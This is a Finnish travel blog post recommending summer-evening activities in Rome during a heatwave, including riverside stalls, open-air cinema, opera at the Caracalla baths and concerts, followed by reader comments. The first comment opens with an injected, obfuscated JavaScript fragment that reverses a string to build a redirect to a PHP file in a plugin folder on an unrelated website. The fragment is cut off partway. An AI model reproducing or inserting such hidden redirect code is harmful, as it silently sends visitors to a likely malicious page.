Subscribe & Follow

Tekemistä Roomassa

Rooma kesäkaupunkina

13/07/2017

Viime päivinä viikkoina on käynyt sääliksi turisteja, jotka ovat päättäneet vierailla Roomassa kesällä. Roomassa on nimittäin jo kesäkuun alusta ollut lämpöaalto, joka on pitänyt hellelukemat reilusti yli 30 asteen, nyt jo 40 asteen tuntumassa. Elämä kaupungissa käy päivisin lähes sietämättömäksi: kauppareissun jälkeen saa mennä suihkuun, kukat kuolevat runsaasta kastelusta huolimatta, ihmiset ja etenkin lapset ovat ärtyisiä ja kiukkuisia ja läheisen sairaalan ambulanssit tuntuvat kulkevan tavallista useammin pillit päällä. Lisäbonuksena on kaikkialle tunkeva pöly ja saasteet ja nyt myös savu, sillä täällä ei ole satanut moneen viikkoon ja Rooman ympäristössä on paljon maastopaloja kuivuuden vuoksi. Bracciano-järven pinta on laskenut niin, että Rooman kuuluisia vesihanoja – nasoneja – on päätetty sulkea.

Minä voin sentään lähteä vaikka Bau Beachille tai mennä varjoon terassillemme, jolla tuulee aina tai vain pysytellä sisällä (ja selailla ilmoituksia kesäasunnoista viileillä vuorilla). Ei tulisi mieleenkään lähteä nyt kiertelemään nähtävyyksiä, etenkään Fontana di Treville, Colosseumille, Forum Romanumille, jotka tarjoavat varsin vähän suojaa auringolta.

Mutta sitten tulee ilta ja lämpötila laskee lempeämmäksi. Aurinko tulee alemmas ja varjoisia paikkoja löytyy kaupungista yhä enemmän. Ulkona tarkenee istua kesämekossa myöhään yöhön. Iltaisin Rooman kadut ja piazzat täyttyvät ihmisistä. Rooma on kesällä helvetillinen, jos haluaa kierrellä nähtävyyksiä, mutta aika ihana kesäkaupunki iltaisin.

Tässä parhaat vinkkini, mitä Roomassa voi kesäiltaisin tehdä:

1. Syö, juo ja shoppaile Tiberin rantapenkoilla

Lungotevere

Jalkapallopeliä Lungoil Teverella

Kesäisin Tiberin rantapenkat täyttyvät erilaisista ravintola-, kauppa- ja pelikojuista. Aluksi Lungo il Tevere-tapahtuman kojuja oli vain Trasteveren kohdalla, mutta nyt niiden rivi yltää pitkälle Testaccioon asti ja toisella suunnalla niitä Castel’ di Angelon ympäristöön saakka. Mitä isommaksi tapahtuma on muuttunut, sitä paremmaksi kojujen tarjonnan laatu on tullut. Tiberin rantapenkalle voi mennä alkuillasta aperitivolle, illalla syömään ja vaikka koko yöksi bilettämään. Drinkit eivät ole halvimmasta päästä (8 – 10 euroa), mutta kaiken maailman katuruokaa – hampurilaisia, sushia, meksikolaista ruokaa – saa suhteellisen edullisesti. Muutaman lasillisen jälkeen voi tehdä hyviä ostoksia monissa käsityöläiskojuissa – tosin nyt joukossa näkyi myös kännykänkuoria ja muuta krääsää tarjoavia rihkamakauppojakin. Jos on Roomassa kesällä, kannattaa ainakin yhtenä ilta kävellä joen varrella!

2. Katso elokuvia tähtitaivaan alla

cinema-trastevere

Photo credit: Roma fanpage

Roomassa on myös useita ulkoilmateattereita, joissa voi katsella elokuvia all’aperto eli avoimen taivaan alla.

Festival Trastevere Rione del Cinema

Trasteveren Piazza San Cosimatolla näytetään elokuvia kesä- ja heinäkuussa joka ilta klo 21. Tänä vuonna tarjonta ulottuu Stanley Kubrickin elokuvista Disneyn piirrettyihin ja David Lynchin elokuvista dokumentteihin. Lauantaisin keskiyöllä esitetään kauhuelokuvia äänettöminä. Elokuvat esitetään alkuperäiskielellä (italialaisin tekstityksin), joten et joudu kärsimään italiaa puhuvasta Jack Nicholsonista Hohdossa.

Isola del Cinema

Isola Tiberinolla, Tiberin keskellä oleva pikku saarella, näytetään marginaalisempiin genreihin luokiteltavia elokuvia. Tänä kesänä ohjelmassa on mm. eurooppalaisten naisohjaajien elokuvia, “itäisen maailman” elokuvia eli mm. balkanilaisia, japanilaisia, eteläkorealaisia ja kiinalaisia leffoja ja dokumentteja.

  • Katso Isola del Cineman ohjelmisto täältä. Huom. Festivaali on maksullinen, liput 4 – 6 €.

La Casa della Cinema (Villa Borghese)

Villa Borghesen La Casa della Cinemassa näytetään elokuvia niin, että joka päivällä on teemansa: tiistaisin esitetään brittielokuvia, keskiviikkoisin Paolo Virzin elokuvia, torstaisin meri-aiheisia elokuvia jne.

3. Oopperaa Caracallan kylpylän raunioissa

Carmen Terme di Caracallassa

2000 vuotta vanhan kylpylän, Terme di Caracallan, raunioissa esitetään joka kesä oopperaa ja balettia. Esityksiä on yleensä heinäkuun puolivälistä elokuun alkupuolelle eli aikaan jolloin olemme useimmiten Suomessa tai muualla kuin Roomassa. Pääsin siksi käymään oopperassa siellä ensimmäistä kertaa vasta tänä kesänä. Kävimme katsomassa Carmen-oopperan, tämän kesän uuden tuotannon. Carmenin tapahtumat oli tässä tuotannossa sijoitettu Amerikan ja Meksikon rajalle. Aluksi olin vähän pettynyt, sillä vaikka arvostankin kantaaottavaa teatteria, niin olisin toivonut Caracallan kylpylässä näkeväni mieluummin perinteisen kuin farkkusortseissa laulavan Carmenin. Mutta kyllä esitys oli ehdottomasti käymisen arvoinen ja lämpenin sille loppua kohti enemmän ja enemmän: onhan koko ympäristö ainutlaatuinen ja upealla valaistuksella Caracallan rauniot muuttuivat milloin meksikolaiseksi yökerhoksi, milloin vuoriksi.

  • Oopperaa Terme di Caracallassa 28.6 – 9.8. 2017. Carmenin lisäksi Puccinin Tosca ja Verdin Nabucco. Lippuja myy Ticketone.
  • Vinkki: osta halvimmat liput ja kun “ovet” suljetaan ja valot sammutetaan juokse täysillä parhaille vapaille paikoille. Cosi fan tutte. Oma näytöksemme sunnuntaina oli vain puolillaan joten saimme hyvät paikat, vaikka emme hämmennyksissämme heti ensimmäisten joukossa paikkoja vaihtaneetkaan.

4. Käy maailmanmusiikki- ja jazz-konserteissa puistoissa

On tietysti vähän tyhmää suositella tapahtumia, joista ei ole omakohtaista kokemusta, mutta Rooman puistot ovat niin hienoja ja vähän tunnettuja, että otan riskin. Menisin itse näihin mielelläni, jos ne vaan olisivat sopivampien yhteyksien päästä kotoani:

Maailmanmusiikkia Villa Adassa

Villa Adassa järjestetään kesäisin Roma incontra il mondo -festivaali (suom. Rooma kohtaa maailman), jossa lähes joka ilta voi kuunnella ja tanssia eri puolilta maailmaa olevien esiintyjien tahdissa.

Jazzia Casa del Jazzin puutarhassa

Toisin kuin joissakin matkaoppaissakin mainitaan, Colosseumin lähellä olevassa Villa Torlonian puistossa ei enää pidetä kesäisin jazz-konsertteja. Sen sijaan jazzia voi kuunnella läheisen kuuluisan jazzklubin Casa del Jazzin puutarhassa.

5. Nauti katutaiteesta, lämpimistä kesäilloista ja elämästä piazzoilla

Piazza di Santa Maria in Trastevere by nightKesäiltaisin roomalaisten elämä siirtyy piazzoille ja kaduille. Toisilla piazzoilla lapset pelaavat jalkapalloa ja isovanhemmat syövät gelatoa, toisille levittäytyvät ympäröivien ravintoloiden terassit ja joillakin on mahdollista katsoa aivan huippuluokan katutaide-esityksiä taikureista breakdanceen. Piazza di Santa Maria in Trastevere on tällainen – sen katutaide-esitykset voivat olla paras elämys matkallasi, myös lapsille (vaikka on Trasteveressa se surullisenkuuluisa maailman huonoin taikurikin. “Guarda uno, guarda due…”)

Ulkona syömistä Ghettossa

Kuten ehkä huomaatte, monet mainitsemistani taphtumista päättyvät elokuun alkupuolella. Elokuun puolessa välissä alkaa italialaisten lomakausi ja Rooma keskustaa lukuun ottamatta muuttuu autioksi kaupungiksi. Useimmat keskustan ravintolat ovat kuitenkin auki, Tiberin rannoilla ja piazzoilla on elämää silloinkin. Elokuussa olenkin mieluummin Roomassa kuin täpötäysillä rannoilla!

Nämä tapahtumat ovat myös jokakesäisiä, joten tästä saat vinkit myös tulevia kesiä varten!

Tykkää ja jaa:
RSS
Twitter
Visit Us
Follow Me
Instagram

16
Leave a Reply

avatar
11 Comment threads
5 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
12 Comment authors
SabePiutsiAnna | Tämä matkaJane / Lomaunelmia ja unelmalomiaAnna K. - Kaukaa haettua Recent comment authors

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
newest oldest most voted
Notify of
S<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitaco
Guest
S totta se, että miksi ängetä kaupunkilomalle keskellä kuuminta kesää! Me koimme sen nyt kesäkuussa Korfulla ja Meteorassa.

Jestas, mitkä helteet! Siinä menis meillä ämpärikaupalla gelatoa. Ja aikuisilla ehkä liikaa huurteisia. Meillä odottaa kauan odotettu Rooman-matka lokakuussa. Tullaan sinne koko perheellä, mukana 2v ja melkein 5v. Olenkin tässä viime päivinä selaillut blogiasi ja nappaillut sieltä täältä meille vinkkejä. Sellaista vielä kysyisin, että majoittaisitko mieluummin perheen Trastevereen vai Montiin? Luin jostain kommentista, että se Monti voisi olla Trasteverea edullisempi mutta silti hyvä sijainti. Rooman keskustan tuntumassa ei taida olla juurikaan lasten leikkipaikkoja? Meillä ovat kyllä tottuneita kaupunkimatkailijoita, että varmasti saadaan viihtymään muutenkin. Ainakin jätskillä lahjottuna jos ei muuten. 😀

Katariina
Guest

Kivoja vinkkejä kesäiseen Roomaan! Ekan kerran olin Roomassa tukalan kuumaan aikaan elokuussa, ja sen jälkeen matkat sinne on valikoitu mieluummin tapahtuviksi joko syksymmällä tai keväämmällä. Kuumansie tokykyni suurkaupungeissa on aika huono 🙂

Anna K. - Kaukaa haettua
Guest

Kyllä sääliksi käy myös näitä Helsinkiin eksyviä turisteja, jotka kysyy ihan pokkana Is this really your summer? Täällä kun helvetillinen kylmyys jatkuu ja jatkuu. Ei toki tuo +40 kivalta kuulosta, mutta antaisin aika paljon, jos saisin kävellä edes hetken kesämekossa!
Kivoja tunnelmakuvia ja joukossa ihan uusia paikkoja mulle, vaikka pari kertaa olen Roomassa ollut. Aika jännä, että juomingit piazzoilla kielletty kokonaan! Harmi. Mutta eihän kukaan jaksa jatkuvaa sikailua katsoa.

Jane / Lomaunelmia ja unelmalomia
Guest

Jos lähettäisit Suomeen vajaat 10 C niin kaikilla osapuolilla olisi mukavempaa! Vaan nuo lämpimät eteläisen Euroopan illat, on ne niin ihania.

Mies haluaa Roomaan kun ei ole siellä käynyt (itse kerran 90-luvun lopulla) joten se on lähivuosien suunnitelmissa. Kylläkin keväällä tai syksyllä..!

Anna | Tämä matka
Guest

+40 on päivällä ihan liikaa, mutta kun yö saapuu, niin lempeä lämpö on kyllä ihanaa. Ainut vaan, että itse olen melkoisen iltauninen, joten voisi jäädä Rooman kiertely tuolla kelillä melko vähiin. Ollaan oltu Roomassa aina onneksi joko aikaisin kevällä tai myöhään syksystä, jolloin ilma on sellainen “Suomen kesä”, eli sopii oikein hyvin meille.

Piutsi
Guest
Piutsi

Piti tulla ihan kiitos sanomaan. Me lomailimme ystävän kanssa Roomassa kolme viikkoa sitten ja huh kyllä lämpöä riitti. Blogisi ansiosta, oli helppoa päästä kentältä kaupunkiin, löydettiin ihana ravintola ja vierailtiin ekaa kertaa oopperassa. Joten paljon apua ja hyviä vinkkejä löytyi, kiitos siitä! Trasteveren ravintola suosituksista kokeilimme Marco G:tä ja se oli täydellinen ravintola kokemus. Kokeilimme kaikki mitä suosittelit, alkupala lajitelmaa, pasta carponaraa ja talon viiniä! Parasta ruokaa ikinä. Caracallan oopperassa kävimme katsomassa Carmenin tarinan. Eka kertaa oopperassa ja mikä kokemus niin hienoit oli puitteet. Tästäkään ei olisi kyllä tiedetty ilman blogiasi. Kipsin kanssa oli ihan huomata kuinka ystävällisiä ihmiset olivat,… Read more »

Sabe
Guest

Tulin juuri Roomasta ja kovin pettynyt olen.. Ihmiset olivat todella töykeitä, kukaan ei osaa englantia, jopa turisti infon porulla oli töykeää ja antoi vääriä neuvoja. Roskia ja saastaa joka puolella, varkaita ja huijareita joka kulmalla.. Ehdottomosti huonoin kaupunkiloma jonka olen euroopassa viettänyt ja olen käynyt kaikkialla.